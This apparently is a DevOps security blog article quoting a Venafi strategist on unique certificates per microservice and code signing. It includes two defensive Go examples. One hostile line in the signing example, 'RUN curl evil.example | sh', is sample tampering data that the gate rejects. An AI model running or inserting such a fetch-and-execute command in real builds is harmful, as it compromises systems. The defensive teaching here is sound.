A well-defined DevOps team can be a substantial asset to any organization. The benefits of DevOps are outstanding: effective programs deliver faster response times, increase customer satisfaction, and improve operational efficiency.
Unfortunately, a sizable number of businesses feel that the agility of DevOps may come at the cost of security. As a recent Venafi study revealed, many organizations fail to enforce vital cryptographic security measures in their DevOps environments.
We noticed these issues were especially prevalent amongst organizations that were in the process of adopting DevOps programs. However, even organizations with mature DevOps programs often did not follow security practices that were designed to protect cryptographic keys and digital certificates.
So, how can we improve the operational security of DevOps teams? The first step is to recognize that safety and agility are not in conflict. “Software developers need to think like Formula 1 engineers -- they need to push to extreme limits of speed without crashing,” says Kevin Bocek, chief security strategist for Venafi. “As a result, they must implement safety in everything they do. For DevOps engineers, one key area for safety is security and DevOps automation.”
For example, it’s imperative that developers give each microservice or container they deploy its own cryptographic identity. “If they don’t take the time to do this, it leaves a door open that would allow attackers to be authenticated and trusted,” continues Kevin. “Developers focused on speed often reuse a TLS certificate many times over, and this also is a DevOps security issue that can allow an adversary to be authenticated and trusted.”
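The following Go program is an added illustration of that point, not code from Venafi or from the original article. It stands up a throwaway internal CA (all names such as `payments.internal` and `demo-internal-ca` are hypothetical), issues one certificate whose SAN names exactly one service and one shared wildcard certificate of the kind that gets copied into every container, and then asks the standard-library verifier which identities each certificate can claim. The shared certificate lets anyone holding its key pass as any service; the per-service certificate is accepted only as the one workload it names.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// newCA creates a throwaway self-signed issuing CA (hypothetical, demo only).
func newCA() (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: "demo-internal-ca"},
		NotBefore:             time.Now().Add(-time.Minute),
		NotAfter:              time.Now().Add(24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageDigitalSignature,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

// issueCert issues a short-lived leaf from the CA carrying the given SAN entries.
// One exact SAN is a per-workload identity; a wildcard SAN is the "reused" certificate.
func issueCert(ca *x509.Certificate, caKey *ecdsa.PrivateKey, serial int64, sans ...string) (*x509.Certificate, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(serial),
		Subject:      pkix.Name{CommonName: sans[0]},
		DNSNames:     sans,
		NotBefore:    time.Now().Add(-time.Minute),
		NotAfter:     time.Now().Add(time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, ca, &key.PublicKey, caKey)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// accepted reports whether a peer presenting leaf would be trusted as the service
// named by expected: the chain must reach the CA and a SAN must match the name.
func accepted(leaf *x509.Certificate, roots *x509.CertPool, expected string) bool {
	_, err := leaf.Verify(x509.VerifyOptions{Roots: roots, DNSName: expected})
	return err == nil
}

// IdentityScenario compares a per-service certificate with a shared wildcard one.
// Keys read "<certificate> as <claimed identity>"; values say whether a verifier accepts it.
func IdentityScenario() (map[string]bool, error) {
	ca, caKey, err := newCA()
	if err != nil {
		return nil, err
	}
	roots := x509.NewCertPool()
	roots.AddCert(ca)
	payments, err := issueCert(ca, caKey, 2, "payments.internal")
	if err != nil {
		return nil, err
	}
	shared, err := issueCert(ca, caKey, 3, "*.internal")
	if err != nil {
		return nil, err
	}
	return map[string]bool{
		"payments-cert as payments.internal":  accepted(payments, roots, "payments.internal"),
		"payments-cert as inventory.internal": accepted(payments, roots, "inventory.internal"),
		"shared-cert as payments.internal":    accepted(shared, roots, "payments.internal"),
		"shared-cert as inventory.internal":   accepted(shared, roots, "inventory.internal"),
	}, nil
}

func main() {
	res, err := IdentityScenario()
	if err != nil {
		panic(err)
	}
	fmt.Println(res)
}
```

The check that matters is the `DNSName` in `VerifyOptions`: a verifier that only confirms the chain reaches the CA, without pinning the name to the workload it expects to talk to, gets no benefit from unique certificates either. Short lifetimes (one hour above) are what make per-workload issuance sustainable in an automated pipeline.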
The DevOps security issues that occur during development can become more pronounced as time passes. “Engineers who build code in development pipelines may forget to sign their code using digital certificates, which could allow hackers to make dangerous modifications to code,” says Kevin. “Ultimately, the speed of DevOps can increase the risk that a vulnerability that exists in the development and test environments will move straight through to production.”
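The program below is an added example of the signing gate that sentence describes; it is not code from Venafi or from the article. A build stage signs the SHA-256 digest of an artifact with a key that never leaves the build system, and a deploy stage that holds only the matching public key refuses anything unsigned, modified after signing, or signed by some other key. The artifact bytes, the `app:1.0` names and the `evil.example` host are constructed for the demo; a real pipeline would carry the signature alongside the artifact in a registry.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Artifact is what the build stage hands to the deploy stage: the bytes plus a
// detached signature over their SHA-256 digest (empty if the build never signed).
type Artifact struct {
	Name string
	Data []byte
	Sig  []byte
}

// signArtifact is the build-stage step; the private key stays with the build system.
func signArtifact(name string, data []byte, priv ed25519.PrivateKey) Artifact {
	digest := sha256.Sum256(data)
	return Artifact{Name: name, Data: data, Sig: ed25519.Sign(priv, digest[:])}
}

// admit is the deploy-stage gate. It holds only the trusted public key and refuses
// anything unsigned, modified after signing, or signed by a different key.
func admit(a Artifact, trusted ed25519.PublicKey) error {
	if len(a.Sig) == 0 {
		return errors.New(a.Name + ": unsigned artifact")
	}
	digest := sha256.Sum256(a.Data)
	if !ed25519.Verify(trusted, digest[:], a.Sig) {
		return errors.New(a.Name + ": signature does not verify under the trusted key")
	}
	return nil
}

// SigningScenario runs four artifacts through the gate; values say whether each was admitted.
func SigningScenario() (map[string]bool, error) {
	trustedPub, buildPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	_, roguePriv, err := ed25519.GenerateKey(rand.Reader) // an attacker's own key
	if err != nil {
		return nil, err
	}
	// Constructed sample artifact standing in for a container image or binary.
	image := []byte("FROM scratch\nCOPY app /app\nENTRYPOINT [\"/app\"]\n")

	good := signArtifact("app:1.0", image, buildPriv)
	// Same signature, but a line appended after signing (hypothetical tampering).
	tampered := Artifact{Name: "app:1.0-tampered", Sig: good.Sig,
		Data: append(append([]byte{}, image...), "RUN curl evil.example | sh\n"...)}
	unsigned := Artifact{Name: "app:1.0-unsigned", Data: image}
	rogue := signArtifact("app:1.0-rogue", image, roguePriv)

	return map[string]bool{
		"signed by build key":     admit(good, trustedPub) == nil,
		"modified after signing":  admit(tampered, trustedPub) == nil,
		"never signed":            admit(unsigned, trustedPub) == nil,
		"signed by untrusted key": admit(rogue, trustedPub) == nil,
	}, nil
}

func main() {
	res, err := SigningScenario()
	if err != nil {
		panic(err)
	}
	fmt.Println(res)
}
```

Only the first artifact passes. The gate is deliberately separate from the signer: if the deploy step can reach the private key, a compromised deploy job can simply re-sign whatever it likes, and the signature proves nothing.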
So, how can security professionals communicate these issues to their DevOps teams? Kevin believes chief information officers (CIOs) may be the ideal mediators.
“CIOs get this new risk and the emerging responsibilities of developers,” concludes Kevin. “Recent research found 79% of global CIOs believed the speed of DevOps has made it more difficult to know what is trusted and what is not. As the IT landscape changes, developers must take steps to improve their operational security with DevOps automation. CIOs can help get this conversation started.”
Is your DevOps team taking proper steps to improve operational security?